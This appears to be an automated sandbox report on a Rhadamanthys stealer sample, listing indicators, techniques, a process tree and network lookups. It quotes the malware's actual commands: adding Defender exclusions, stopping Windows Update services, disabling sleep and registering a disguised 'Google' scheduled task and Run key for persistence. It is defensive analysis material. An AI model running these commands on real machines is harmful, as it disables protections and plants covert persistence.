rhadamanthys | d850df618ed03fd518cb4c52bb09657a2eda865702a0498b965b0279ea73b362

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BrowserUpdate.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	yI9VA7c46.exe
File created	C:\Windows\System32\drivers\etc\hosts	(b_y84O.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BrowserUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BrowserUpdate.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Control Panel\International\Geo\Nation	BrowserUpdate.exe

Deletes itself 1 IoCs

pid	Process
332	certreq.exe

Executes dropped EXE 5 IoCs

pid	Process
1268	4vXB.exe
592	BrowserUpdate.exe
1636	yI9VA7c46.exe
1556	(b_y84O.exe
1592	updater.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Wine	BrowserUpdate.exe

Loads dropped DLL 4 IoCs

pid	Process
1268	4vXB.exe
1052	Process not Found
1052	Process not Found
1048	taskeng.exe

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	4vXB.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google LLC = "C:\\Program Files\\Google\\Chrome\\Application\\BrowserUpdate.exe -l james5453545@protonmail.com"	4vXB.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	sc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
592	BrowserUpdate.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	4vXB.exe
File created	C:\Program Files\Google\Chrome\updater.exe	(b_y84O.exe
File created	C:\Program Files\Google\Chrome\updater.exe	yI9VA7c46.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
432	sc.exe
644	sc.exe
1580	sc.exe
1632	sc.exe
1660	sc.exe
832	sc.exe
1256	sc.exe
1680	sc.exe
2008	sc.exe
2004	sc.exe
332	sc.exe
944	sc.exe
1596	sc.exe
1332	sc.exe
1532	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	certreq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	certreq.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
344	schtasks.exe
756	schtasks.exe
1096	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 202cee4bcca4d901	powershell.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2004	file.exe
2004	file.exe
2004	file.exe
2004	file.exe
332	certreq.exe
332	certreq.exe
332	certreq.exe
332	certreq.exe
592	BrowserUpdate.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1796	powershell.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1332	sc.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1308	powershell.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1276	cmd.exe
1556	(b_y84O.exe
1556	(b_y84O.exe
1636	yI9VA7c46.exe
1636	yI9VA7c46.exe
1592	updater.exe
1592	updater.exe
2032	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1332	sc.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeShutdownPrivilege	1592	updater.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeShutdownPrivilege	1336	powercfg.exe
Token: SeDebugPrivilege	1276	cmd.exe
Token: SeShutdownPrivilege	432	powercfg.exe
Token: SeShutdownPrivilege	1448	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	1632	powercfg.exe
Token: SeShutdownPrivilege	1576	powercfg.exe
Token: SeDebugPrivilege	2032	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe
592	BrowserUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 2004 wrote to memory of 332	2004	file.exe	29
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1268 wrote to memory of 592	1268	4vXB.exe	32
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 432	1436	cmd.exe	65
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 644	1436	cmd.exe	43
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1436 wrote to memory of 1580	1436	cmd.exe	44
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1128 wrote to memory of 1632	1128	cmd.exe	70
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1436 wrote to memory of 1256	1436	cmd.exe	47
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 944	1128	cmd.exe	49
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1128 wrote to memory of 2008	1128	cmd.exe	81
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1436 wrote to memory of 1680	1436	cmd.exe	89
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 2004	1128	cmd.exe	51
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 1128 wrote to memory of 1596	1128	cmd.exe	53
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 900 wrote to memory of 1592	900	cmd.exe	77
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 1904 wrote to memory of 1656	1904	cmd.exe	61
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 900 wrote to memory of 1336	900	cmd.exe	62
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 432	1904	cmd.exe	65
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 1904 wrote to memory of 1136	1904	cmd.exe	67
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 900 wrote to memory of 1448	900	cmd.exe	66
PID 1276 wrote to memory of 344	1276	cmd.exe	68
PID 1276 wrote to memory of 344	1276	cmd.exe	68
PID 1276 wrote to memory of 344	1276	cmd.exe	68

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	certreq.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	certreq.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1200
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2004
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  - Deletes itself
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - outlook_office_path
  - outlook_win_path
  PID:332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1332
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:432
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:644
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1580
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1256
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1680
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:944
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2008
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2004
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zmjvgdgm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1308
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:756
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:900
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1592
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjciy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1276
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:344
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1856
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:528
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1660
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:332
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Drops file in System32 directory
    - Launches sc.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1532
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:832
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1276
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1604
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zmjvgdgm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1528
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1096
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1788
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:992
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1256

C:\Users\Admin\AppData\Local\Microsoft\4vXB.exe
"C:\Users\Admin\AppData\Local\Microsoft\4vXB.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
  "C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe" -l james5453545@protonmail.com
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:592

C:\Users\Admin\AppData\Local\Microsoft\yI9VA7c46.exe
"C:\Users\Admin\AppData\Local\Microsoft\yI9VA7c46.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Users\Admin\AppData\Local\Microsoft\(b_y84O.exe
"C:\Users\Admin\AppData\Local\Microsoft\(b_y84O.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1556

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:1632

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\system32\taskeng.exe
taskeng.exe {2CBC4CFB-AE66-469E-AC85-F573DEDD9856} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1048
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1592

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2071785887-1226335026-934456637-1032687295934737698-2003114986377765491013590629"
1⤵
PID:2008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1108598211-160475057013085022451936920636-295928186-218446816949602026-551825290"
1⤵
PID:1680

Network

DNS

api.peer2profit.global

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

api.peer2profit.global

IN A

Response

api.peer2profit.global

IN A

172.67.69.54

api.peer2profit.global

IN A

104.26.8.6

api.peer2profit.global

IN A

104.26.9.6
DNS

45.72.251.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.72.251.87.in-addr.arpa

IN PTR

Response

45.72.251.87.in-addr.arpa

IN PTR

devops-zbrexamplecom
DNS

fp.check.peer2profit.site

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

fp.check.peer2profit.site

IN A

Response

fp.check.peer2profit.site

IN A

162.19.176.4
DNS

ubuntu.com

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

ubuntu.com

IN A

Response

ubuntu.com

IN A

185.125.190.20

ubuntu.com

IN A

185.125.190.21

ubuntu.com

IN A

185.125.190.29
DNS

www.wikipedia.org

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

www.wikipedia.org

IN A

Response

www.wikipedia.org

IN CNAME

dyna.wikimedia.org

dyna.wikimedia.org

IN A

208.80.154.224
DNS

twitter.com

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.193
DNS

fp-1.check.peer2profit.site

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

fp-1.check.peer2profit.site

IN A

Response

fp-1.check.peer2profit.site

IN A

91.121.63.37
DNS

twitch.tv

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

twitch.tv

IN A

Response

twitch.tv

IN A

151.101.66.167

twitch.tv

IN A

151.101.2.167

twitch.tv

IN A

151.101.194.167

twitch.tv

IN A

151.101.130.167
DNS

en.wikipedia.org

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

en.wikipedia.org

IN A

Response

en.wikipedia.org

IN CNAME

dyna.wikimedia.org

dyna.wikimedia.org

IN A

208.80.154.224
DNS

www.twitch.tv

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

www.twitch.tv

IN A

Response

www.twitch.tv

IN CNAME

twitch.map.fastly.net

twitch.map.fastly.net

IN A

199.232.150.167
DNS

api.blocklist.de

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

api.blocklist.de

IN A

Response

api.blocklist.de

IN A

185.21.103.31
GET

http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

BrowserUpdate.exe

Remote address:

185.21.103.31:80

Request

GET http://api.blocklist.de/api.php?ip=154.61.71.13&start=1 HTTP/1.1
Host: api.blocklist.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 22 Jun 2023 05:42:26 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 46
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 22 Jun 2023 05:27:26 GMT
Cache-Control: private, max-age=1687411646, pre-check=86400
Last-Modified: Thu, 22 Jun 2023 05:42:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
X-Frame-Options: sameorigin
Cache-Control: public
DNS

otx.alienvault.com

BrowserUpdate.exe

Remote address:

8.8.8.8:53

Request

otx.alienvault.com

IN A

Response

otx.alienvault.com

IN A

108.156.60.81

otx.alienvault.com

IN A

108.156.60.87

otx.alienvault.com

IN A

108.156.60.62

otx.alienvault.com

IN A

108.156.60.60
GET

http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

Remote address:

185.21.103.31:80

Request

GET http://api.blocklist.de/api.php?ip=154.61.71.13&start=1 HTTP/1.1
Host: api.blocklist.de
User-Agent: Mozilla/5.0 CK={} (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 22 Jun 2023 05:42:26 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 46
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 22 Jun 2023 05:27:26 GMT
Cache-Control: private, max-age=1687411646, pre-check=86400
Last-Modified: Thu, 22 Jun 2023 05:42:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
X-Frame-Options: sameorigin
Cache-Control: public
DNS

www.threatcrowd.org

Remote address:

8.8.8.8:53

Request

www.threatcrowd.org

IN A

Response

www.threatcrowd.org

IN CNAME

prod-otxb-threatcrowd.otxb.io

prod-otxb-threatcrowd.otxb.io

IN CNAME

